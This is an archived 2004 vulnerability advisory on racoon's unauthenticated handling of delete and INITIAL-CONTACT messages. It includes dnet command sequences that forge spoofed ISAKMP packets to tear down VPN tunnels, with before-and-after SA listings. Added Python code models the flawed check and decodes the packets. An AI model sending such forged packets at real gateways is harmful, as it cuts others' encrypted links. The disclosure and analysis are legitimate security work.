unauthorized deletion of IPsec (and ISAKMP) SAs in racoon

2004-01-14T00:00:00
ID SECURITYVULNS:DOC:5632
Type securityvulns
Reporter Securityvulns
Modified 2004-01-14T00:00:00

Description

0 Preface

Now that most bugs in isakmpd that allowed for unauthorized SA deletion are "fixed", it's time to release some information on racoon.

By the way: About 5 months ago I tried to contact the KAME developers.

1 Summary

racoon, KAME's IKE daemon, contains flaws that allow unauthorized deletion of IPsec (and ISAKMP) SAs.

2 Description

2.1 racoon's "authentication" of delete messages

When racoon receives a delete message carrying the initiator cookie
of a main/aggressive/base mode exchange that has not yet set up an
ISAKMP SA, it fulfills the request as long as the message also
includes a (dummy) hash payload and originates from the expected IP
address. Since phase 1 never completed there is no SKEYID_a to verify
the hash against, so the hash payload only has to be present, not
correct. See isakmp_main() in isakmp.c and purge_isakmp_spi(),
purge_ipsec_spi(), isakmp_info_recv() and isakmp_info_recv_d() in
isakmp_inf.c for details and amusement.

2.2 INITIAL-CONTACT with racoon

It is nearly the same with INITIAL-CONTACT notifications, but there
is no need for a (dummy) hash payload at all, and it is far more
effective, because racoon then deletes all IPsec SAs "relatived to the
destination address" rather than only the SPIs named in the message.
See isakmp_info_recv_n() and info_recv_initialcontact() in
isakmp_inf.c for additional information.
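
The two checks described in 2.1 and 2.2, side by side with what a receiver should do instead, as an added example. This is not code from the advisory or from racoon; it is a Python model of the acceptance decision. The established-SA cookie a1a2a3a4a5a6a7a8, its SKEYID_a value and the message ID are hypothetical, HMAC-SHA1 stands in for the negotiated prf, and the delete/notify payload bodies are taken from section 4.

```python
import hashlib
import hmac

# Phase 1 state table keyed by initiator cookie. SKEYID_a only exists once
# phase 1 has completed; the 0x17 cookie is the half-open state left behind
# by the spoofed first message in section 4. (Constructed sample data.)
PHASE1 = {
    bytes.fromhex("a1a2a3a4a5a6a7a8"): {          # hypothetical established SA
        "peer": "vpn-gw-b", "established": True,
        "skeyid_a": hashlib.sha1(b"hypothetical SKEYID_a").digest()},
    bytes.fromhex("1717171717171717"): {          # attacker's half-open exchange
        "peer": "vpn-gw-b", "established": False, "skeyid_a": None},
}

def hash1(skeyid_a, message_id, payloads):
    """HASH(1) of an informational exchange (RFC 2409 5.7):
    prf(SKEYID_a, M-ID | N/D), with HMAC-SHA1 as the prf here."""
    return hmac.new(skeyid_a, message_id.to_bytes(4, "big") + payloads, hashlib.sha1).digest()

def accept_vulnerable(i_cookie, src, hash_payload, kind):
    """Models the behaviour the advisory describes: any phase 1 state for the
    cookie plus the expected source address is enough. A delete needs some
    HASH payload to be present (its content is never checked); an
    INITIAL-CONTACT notification does not even need that."""
    st = PHASE1.get(i_cookie)
    if st is None or st["peer"] != src:
        return False
    return kind == "initial-contact" or hash_payload is not None

def accept_hardened(i_cookie, src, hash_payload, message_id, payloads):
    """Only an established phase 1 SA can authenticate the message, and the
    HASH payload must be the correct HASH(1) over it (constant-time compare)."""
    st = PHASE1.get(i_cookie)
    if st is None or not st["established"] or st["peer"] != src:
        return False
    if hash_payload is None:
        return False
    expected = hash1(st["skeyid_a"], message_id, payloads)
    return hmac.compare_digest(hash_payload, expected)

def scenario():
    """Legitimate delete from the established peer versus the attacker's
    delete and INITIAL-CONTACT sent under the half-open cookie."""
    good = bytes.fromhex("a1a2a3a4a5a6a7a8")
    spoof = bytes.fromhex("1717171717171717")
    # DELETE payload body from 4.1: DOI IPsec, ESP, one 4-byte SPI 0xf6059979
    delete_body = bytes.fromhex("00000001" "03040001" "f6059979")
    # NOTIFY body from 4.2: DOI IPsec, ISAKMP, no SPI, INITIAL-CONTACT (24578)
    notify_body = bytes.fromhex("00000001" "01006002")
    mid = 0x4d3c2b1a                        # hypothetical message ID of the legitimate exchange
    legit_hash = hash1(PHASE1[good]["skeyid_a"], mid, delete_body)
    return {
        "legit delete, vulnerable": accept_vulnerable(good, "vpn-gw-b", legit_hash, "delete"),
        "legit delete, hardened": accept_hardened(good, "vpn-gw-b", legit_hash, mid, delete_body),
        # attacker: HASH payload present but zero bytes long, message ID 0
        "spoofed delete, vulnerable": accept_vulnerable(spoof, "vpn-gw-b", b"", "delete"),
        "spoofed delete, hardened": accept_hardened(spoof, "vpn-gw-b", b"", 0, delete_body),
        "spoofed INITIAL-CONTACT, vulnerable": accept_vulnerable(spoof, "vpn-gw-b", None, "initial-contact"),
        "spoofed INITIAL-CONTACT, hardened": accept_hardened(spoof, "vpn-gw-b", None, 0, notify_body),
    }

if __name__ == "__main__":
    for case, accepted in scenario().items():
        print("%-36s %s" % (case, "ACCEPTED" if accepted else "rejected"))
```

The point of the model is the third and fifth case: with a cookie that matches only a half-open exchange, the vulnerable policy accepts a delete whose HASH payload is empty and an INITIAL-CONTACT with no hash at all, because there is no key to check anything against. The hardened policy has nothing to verify either, and therefore refuses.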

3 Affected Systems

All versions of racoon are affected.

4 Leveraging the Issues ..

Take a look at http://securityfocus.com/archive/1/348637 for the assumed scenario.

4.1 .. using delete messages

An IPsec tunnel between vpn-gw-a and vpn-gw-b is established:

  vpn-gw-a# setkey -D 
  <vpn-gw-a's IP address> <vpn-gw-b's IP address>
          esp mode=tunnel spi=4127562105(0xf6059979) reqid=0(0x00000000)
          [..]
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
          [..]

The attacker launches step 1 of his attack. He pretends to initiate a
phase 1 exchange (with spoofed source IP address, of course):

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x01\x10\x02\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x48" \
  >     "\x00\x00\x00\x2c" \
  >     "\x00\x00\x00\x01" \
  >     "\x00\x00\x00\x01" \
  >       "\x00\x00\x00\x20" \
  >       "\x01\x01\x00\x01" \
  >         "\x00\x00\x00\x18" \
  >         "\x00\x01\x00\x00" \
  >         "\x80\x01\x00\x05" \
  >         "\x80\x02\x00\x02" \
  >         "\x80\x03\x00\x01" \
  >         "\x80\x04\x00\x02" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

If racoon finds the included proposal acceptable, it creates phase 1
state keyed by the attacker's cookie. Now the attacker carries out step 2:

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x08\x10\x05\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x30" \
  >     "\x0c\x00\x00\x04" \
  >     "\x00\x00\x00\x10" \
  >     "\x00\x00\x00\x01" \
  >     "\x03\x04\x00\x01" \
  >     "\xf6\x05\x99\x79" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

It seems that racoon knows the attacker ;-):

  vpn-gw-a# setkey -D
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
          [..]

Note: ISAKMP SAs can be deleted the same way (protocol ID 1 and the cookie pair as the SPI in the delete payload).

4.2 .. using INITIAL-CONTACT

The IPsec tunnel is up and running:

  vpn-gw-a# setkey -D
  <vpn-gw-a's IP address> <vpn-gw-b's IP address>
          esp mode=tunnel spi=785352974(0x2ecf890e) reqid=0(0x00000000)
          [..] 
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=183367627(0x0aedf7cb) reqid=0(0x00000000)
          [..]

Again the attacker does step 1 and injects an ISAKMP message like
this:

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x0b\x10\x05\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x28" \
  >     "\x00\x00\x00\x0c" \
  >     "\x00\x00\x00\x01" \
  >     "\x01\x00\x60\x02" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

racoon blindly obeys the attacker's command:

  vpn-gw-a# setkey -D
  No SAD entries.
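
An added example, not part of the advisory and not racoon code: a Python decoder that reassembles the three dnet hex strings above into ISAKMP messages and walks their payload chains, checking every length field against the bytes actually present before using it. The byte strings are copied from the advisory; the field names follow RFC 2408, RFC 2409 and the IPsec DOI (RFC 2407). Only the first proposal and first transform of an SA payload are decoded, which is all the advisory's messages carry.

```python
import struct

# The three ISAKMP messages from section 4, reassembled from the dnet hex
# arguments (copied from the advisory; the 0x17 cookie is its own choice).
STEP1_MAIN_MODE = bytes.fromhex(
    "1717171717171717" "0000000000000000" "01100200" "00000000" "00000048"
    "0000002c" "00000001" "00000001"             # SA: DOI IPsec, SIT_IDENTITY_ONLY
    "00000020" "01010001"                        # proposal 1, proto ISAKMP, 1 transform
    "00000018" "00010000"                        # transform 0, KEY_IKE
    "80010005" "80020002" "80030001" "80040002"  # enc 3DES, hash SHA, auth PSK, group 2
)
STEP2_DELETE = bytes.fromhex(
    "1717171717171717" "0000000000000000" "08100500" "00000000" "00000030"
    "0c000004"                                   # HASH payload: header only, no digest
    "00000010" "00000001" "03040001" "f6059979"  # DELETE: ESP, SPI size 4, 1 SPI
)
STEP1_INITIAL_CONTACT = bytes.fromhex(
    "1717171717171717" "0000000000000000" "0b100500" "00000000" "00000028"
    "0000000c" "00000001" "01006002"             # NOTIFY: ISAKMP, no SPI, type 24578
)

EXCHANGE = {2: "main mode", 4: "aggressive mode", 5: "informational"}
PAYLOAD = {1: "SA", 8: "HASH", 11: "NOTIFY", 12: "DELETE"}
PROTO = {1: "ISAKMP", 2: "AH", 3: "ESP"}
NOTIFY = {24578: "INITIAL-CONTACT"}
IKE_ATTR = {1: "enc", 2: "hash", 3: "auth", 4: "group"}

def parse_attributes(data):
    """RFC 2408 data attributes: TV form (type high bit set, 2-byte value)
    as used by this transform, or TLV form with an explicit length."""
    attrs, off = {}, 0
    while off + 4 <= len(data):
        atype, val = struct.unpack("!HH", data[off:off + 4])
        name = IKE_ATTR.get(atype & 0x7FFF, atype & 0x7FFF)
        if atype & 0x8000:
            attrs[name], off = val, off + 4
        else:
            attrs[name], off = data[off + 4:off + 4 + val], off + 4 + val
    return attrs

def parse_isakmp(msg):
    """Decode the 28-byte header, then walk the payload chain; every length
    field is checked against the bytes actually present before it is used."""
    if len(msg) < 28:
        raise ValueError("short header")
    i_cookie, r_cookie, nxt, ver, exch, flags, mid, length = struct.unpack("!8s8sBBBBII", msg[:28])
    if length != len(msg):
        raise ValueError("header length %d != %d bytes on the wire" % (length, len(msg)))
    out = {"i_cookie": i_cookie.hex(), "r_cookie": r_cookie.hex(),
           "version": "%d.%d" % (ver >> 4, ver & 0xF), "flags": flags,
           "exchange": EXCHANGE.get(exch, exch), "message_id": mid, "payloads": []}
    off = 28
    while nxt:
        if off + 4 > len(msg):
            raise ValueError("truncated payload chain at offset %d" % off)
        following, _, plen = struct.unpack("!BBH", msg[off:off + 4])
        if plen < 4 or off + plen > len(msg):
            raise ValueError("bad payload length %d at offset %d" % (plen, off))
        body = msg[off + 4:off + plen]
        p = {"type": PAYLOAD.get(nxt, nxt)}
        if nxt in (1, 11, 12) and len(body) < (16 if nxt == 1 else 8):
            raise ValueError("short %s payload" % p["type"])
        if nxt == 1:       # SA -> first proposal -> first transform
            p["doi"] = struct.unpack("!I", body[:4])[0]
            _, _, _, p["proposal"], prot, spi_size, p["transforms"] = struct.unpack("!BBHBBBB", body[8:16])
            p["protocol"] = PROTO.get(prot, prot)
            t = 16 + spi_size                       # start of the transform payload
            if t + 8 > len(body):
                raise ValueError("SA payload too short for a transform")
            tlen = struct.unpack("!H", body[t + 2:t + 4])[0]
            p["transform_id"] = body[t + 5]
            p["attributes"] = parse_attributes(body[t + 8:t + tlen])
        elif nxt == 8:     # HASH: everything after the generic header is the digest
            p["hash_len"] = len(body)
        elif nxt == 11:    # NOTIFY
            p["doi"], prot, spi_size, ntype = struct.unpack("!IBBH", body[:8])
            p["protocol"], p["notify"] = PROTO.get(prot, prot), NOTIFY.get(ntype, ntype)
        elif nxt == 12:    # DELETE: the SPI list must fill the payload exactly
            p["doi"], prot, spi_size, count = struct.unpack("!IBBH", body[:8])
            if len(body) != 8 + spi_size * count:
                raise ValueError("DELETE carries %d SPI bytes, header promises %d"
                                 % (len(body) - 8, spi_size * count))
            p["protocol"] = PROTO.get(prot, prot)
            p["spis"] = [body[8 + i * spi_size:8 + (i + 1) * spi_size].hex() for i in range(count)]
        out["payloads"].append(p)
        nxt, off = following, off + plen
    if off != len(msg):
        raise ValueError("%d trailing bytes after the last payload" % (len(msg) - off))
    return out

if __name__ == "__main__":
    for name, raw in (("step 1, main mode", STEP1_MAIN_MODE),
                      ("step 2, delete", STEP2_DELETE),
                      ("INITIAL-CONTACT", STEP1_INITIAL_CONTACT)):
        print(name, parse_isakmp(raw))
```

Decoding step 2 shows that the HASH payload is exactly four bytes long, a generic payload header with no digest behind it, which is what "(dummy) hash payload" in 2.1 means, and that the DELETE names ESP SPI 0xf6059979, the first SA listed by setkey -D in 4.1. The INITIAL-CONTACT message carries notify type 24578 under protocol ID 1 (ISAKMP) with no SPI at all.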

5 Bug Fixes

There are no bug fixes.

Thomas Walpuski